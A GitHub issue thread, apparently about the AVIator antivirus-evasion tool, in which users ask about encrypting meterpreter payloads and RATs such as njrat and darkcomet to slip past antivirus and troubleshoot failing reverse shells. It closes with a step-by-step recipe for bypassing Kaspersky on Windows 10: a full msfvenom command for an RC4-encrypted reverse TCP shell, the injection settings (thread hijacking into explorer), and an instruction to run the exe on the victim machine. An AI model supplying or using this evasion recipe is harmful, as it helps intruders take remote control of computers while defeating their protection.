Open Ch0pin opened 5 years ago
pretech86
commented
5 years ago Thanks for your efforts it working well
Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet
Thanks a lot
Ch0pin
commented
5 years ago Thanks for your efforts it working well
Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet
Thanks a lot
not yet , but this is something that for sure I am going to implement in the very near feature
pretech86
commented
5 years ago my Dear i test the windows/ meterpreter/reverse/https and tcp there's no reverse connections
also when i test x64/shell it working there's a reverse connection but no meterpreter channel opened
ghost
commented
5 years ago Once you use meterpreter,the antivirus will detect it.However,shell won't. Maybe encoding the dropped dll is the best way.
pretech86
commented
5 years ago i use x/64 shell and it worked but no channel open although there's a reverse connection?
Ch0pin
commented
5 years ago Make sure you are selecting the right architecture for your shell code and for your target OS. As pple7000 said when u use meterpreter the Av propably will detect it and drop the connection as suspicious, if you use a simple shell payload the bypass works fine.... Just press few enters after the connection is open ;)
Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE) Getting a shell in a windows 10 machine running fully updated kaspersky AV
Target Machine: Windows 10 x64 Create the payload using msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use AVIator with the following settings
Target OS architecture: x64
Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)
Target procedure: explorer (leave the default)
Set the listener on the attacker machine
Run the generated exe on the victim machine